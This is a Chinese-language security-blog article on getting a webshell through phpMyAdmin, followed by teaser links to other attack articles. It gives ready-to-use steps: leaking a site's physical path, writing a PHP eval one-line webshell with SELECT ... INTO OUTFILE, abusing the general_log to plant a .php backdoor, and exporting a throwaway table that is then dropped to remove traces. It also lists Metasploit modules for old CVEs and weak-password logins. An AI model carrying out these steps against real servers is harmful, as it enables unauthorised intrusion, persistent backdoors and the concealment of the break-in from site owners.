GetShell思路之phpMyadmin:基于PHP的MySQL数据库管理工具,使网站管理员可以通过Web界面管理数据库。
摘要:基于PHP的MySQL数据库管理工具,使网站管理员可以通过Web界面管理数据库。本部分主要收集网站的物理路径,否则将无法通过URL连接Shell。
基于PHP的MySQL数据库管理工具,使网站管理员可以通过Web界面管理数据库。本部分主要收集网站的物理路径,否则将无法通过URL连接Shell。
物理路径
查询数据库存储路径以推断网站的物理路径,也可以通过log变量获得
select @@datadir;
配置文件爆路径:如果注入点具有文件读取权限,则可以尝试通过load_file读取配置文件
c:\windows\php.ini c:\windows\system32\inetsrv\MetaBase.xml php.ini httpd/conf.d/php.conf httpdhttpd.conf localconf/httpd.conf localconf/httpd.conf localconfhttpd-vhosts.conf
单引号路径:直接在URL后添加单引号。 要求不对单引号进行过滤(gpc = off),并且服务器默认返回错误消息。
www.abc.com/index.php?id=1‘
错误的参数值爆路径:尝试将要提交的参数值更改为不正确的值。
www.abc.com/index.php?id=-1
Nginx文件类型错误解析爆路径:Web服务器必须为Nginx,并且存在文件类型解析漏洞。 在图像地址后添加/x.php,该图像不仅将作为php文件执行,而且还会显示物理路径。
www.abc.com/bg.jpg/x.php
Google爆路径
site:xxx.com warning
site:xxx.com “fatal error”
测试文件爆路径
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php
其他
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpMyAdmin/darkblueorange/layout.inc.php phpMyAdmin/index.php?lang[]=1
/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/phpinfo.php
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
其他资讯
phpMyadmin后台面板可以直接查看MySQL版本,当前用户,操作系统,PHP版本,phpMyadmin版本和其他信息
您还可以通过SQL查询获取其他信息
select version(); -- 查看数据库版本
select @@datadir; -- 查看数据库存储路径
show VARIABLES like '%char%'; -- 查看系统变量
GetShell
先决条件
网站的真实路径。 如果您不知道网站的真实路径,则无法通过URL连接到Shell。
读写权限。 查询secure_file_priv参数以查看其是否具有读取和写入文件权限。 如果为NULL,则无法写入Shell。 该值是只读的,只能通过配置文件进行修改。 更改后,必须重新启动服务才能生效。
select @@secure_file_priv -- 查询secure_file_priv
-- secure_file_priv=NULL,禁止导入导出
-- secure_file_priv='',不限制导入导出
-- secure_file_priv=/path/,只能向指定目录导入导出
select load_file('c:/phpinfo.php'); -- 读取文件
select '123' into outfile 'c:/shell.php'; -- 写入文件
通用GetShell
通过SQL查询直接写入Shell
-假设物理路径为“ G:\ phpStudy \ WWW”
select '<?php eval($_POST["pwd"]);?>' into outfile 'G:/phpStudy/WWW/shell.php';
日志GetShell
MySQL 5.0及更高版本将创建一个日志文件。 通过修改日志的全局变量并指定日志保存路径来打开日志。 然后通过查询写一个句子木马。 这时,将记录该木马并生成一个日志文件,从而生成GetShell。 但是前提是必须具有对生成的日志文件的读写权限。
查询日志全局变量
show variables like '%general%';
Variable_name Value
general_log OFF
general_log_file G:\phpStudy\MySQL\data\FengSec.log
general_log:日志保存状态
general_log_file:日志保存路径
启用日志保存并配置保存路径
set global general_log = "ON"; -- 打开日志保存
set global general_log_file = "G:/phpstudy/WWW/log.php"; -- 设置日志保存路径,需先得知网站物理路径,否则即使写入了Shell也无法通过URL连接
写shell
select '<?php eval($_POST[pwd]); ?>';
新表GetShell
输入数据库并创建一个新的数据表。
名称是任意的,这里是shell_table
字段数填1
添加字段
字段名称是任意的,这里是xiaoma
字段类型为TEXT
单击表中的“插入”,值为一句话木马
<?php eval($_POST[pwd]); ?>'
执行SQL查询以将此表的内容导出到指定文件
-- 假设物理路径为 "G:\phpStudy\WWW"
select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";
删除表格并删除痕迹
Drop TABLE IF EXISTS shell_table;
以上步骤也可以通过MySQL语句执行
Create TABLE shell_table (xiaoma text NOT NULL) -- 建表
Insert INTO shell_table (xiaoma) VALUES('<?php eval($_POST[1]);?>'); -- 写入
select * from shell_table into outfile 'G:/phpstudy/WWW/shell.php'; -- 导出
Drop TABLE IF EXISTS shell_table; -- 删表
特殊版本GetShell
CVE-2013-3238
受影响的版本:3.5.x <3.5.8.1和4.0.0 <4.0.0-rc3 ANYUN.ORG
漏洞利用模块:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159
受影响的版本:phpMyAdmin v3.5.2.2
漏洞利用模块:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151
phpMyAdmin配置文件/config/config.inc.php存在命令执行
受影响的版本:2.11.x <2.11.9.5和3.x <3.1.3.1
漏洞利用模块:exploit/unix/webapp/phpmyadmin_config
万能密码&弱口令
弱口令:版本phpmyadmin2.11.9.2,直接root用户登录,不需要密码
万能密码:版本2.11.3 / 2.11.4,用户名’localhost’@'@”则登录成功
相关热词搜索:GetShell思路 phpMyadmin MySQL数据库管理工具 Web界面管理数据库 重庆网络安全
上一篇:开源安全模块modsecurity测试攻击有效载荷加密,WebShell流量检测的WAF性能分析
下一篇:减少企业遭受Windows设备网络上的凭据转储攻击漏洞的五个技巧
人机验证(Captcha)绕过方法:使用Chrome开发者工具在目标网站登录页面上执行简单的元素编辑,以实现Captcha绕过
牛创网络: " 人机身份验证(Captcha)通常显示在网站的注册,登录名和密码重置页面上。 以下是目标网站在登录页面中排列的验证码机制。 从上图可以
2020-01-26 12:44:09 )8872( 亮了
自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数
牛创网络: "自动发现IDOR(越权)漏洞的方法:使用BurpSuite中的Autozie和Autorepeater插件来检测和识别IDOR漏洞,而无需手动更改每个请求的参数
2020-01-30 14:04:47 )6288( 亮了
Grafana CVE-2020-13379漏洞分析:重定向和URL参数注入漏洞的综合利用可以在任何Grafana产品实例中实现未经授权的服务器端请求伪造攻击SSRF
牛创网络: "在Grafana产品实例中,综合利用重定向和URL参数注入漏洞可以实现未经授权的服务器端请求伪造攻击(SSRF)。该漏洞影响Grafana 3 0 1至7 0 1版本。
2020-08-12 14:26:44 )4301( 亮了
Nginx反向代理配置及反向代理泛目录,目录,全站方法
牛创网络: "使用nginx代理dan(sui)是http响应消息写入服务地址或Web绝对路径的情况。 写一个死的服务地址是很少见的,但它偶尔也会发生。 最棘手的是写入web绝对路径,特别是如果绝对路径没有公共前缀
2019-06-17 10:08:58 )3858( 亮了
fortify sca自定义代码安全扫描工具扫描规则(源代码编写、规则定义和扫描结果展示)
牛创网络: "一般安全问题(例如代码注入漏洞),当前fortify sca规则具有很多误报,可通过规则优化来减少误报。自带的扫描规则不能检测到这些问题。 需要自定义扫描规则,合规性角度展示安全风险。
2020-02-12 10:49:07 )3505( 亮了
整理几款2020年流行的漏洞扫描工具
牛创网络: "漏洞扫描器就是确保可以及时准确地检测信息平台基础架构的安全性,确保业务的平稳发展,业务的高效快速发展以及公司,企业和国家 地区的所有信息资产的维护安全。
2020-08-05 14:36:26 )2536( 亮了
微擎安装使用技巧-微擎安装的时候页面显示空白是怎么回事?
牛创网络: "我们在公众号开发中,有时候会用到微擎,那我们来看一下微擎安装的时候页面显示空白是怎么回事吧
2019-06-08 15:34:16 )2261( 亮了
渗透测试:利用前端断点拦截和JS脚本替换对前端加密数据的修改
牛创网络: " 本文介绍的两种方法,虽然断点调试比JS脚本代码替换更容易,但是JS脚本代码替换方法可以实现更强大的功能,测试人员可以根据实际需要选择适当的测试方法
2020-01-07 09:34:42 )1995( 亮了
从工业界到学界盘点SAS与R优缺点比较
牛创网络: "虽然它在业界仍然由SAS主导,但R在学术界广泛使用,因为它的免费开源属性允许用户编写和共享他们自己的应用程序 然而,由于缺乏SAS经验,许多获得数据分析学位的学生很难找到工作。
2019-07-13 22:25:29 )1842( 亮了
41款APP侵犯用户隐私权:QQ,小米,搜狐,新浪,人人均被通报
牛创网络: "随着互联网的不断发展,我们进入了一个时代,每个人都离不开手机。 但是,APP越来越侵犯了用户隐私权。12月19日,工业和信息化部发布了《关于侵犯用户权益的APP(第一批)》的通知。
2019-12-20 11:28:14 )1775( 亮了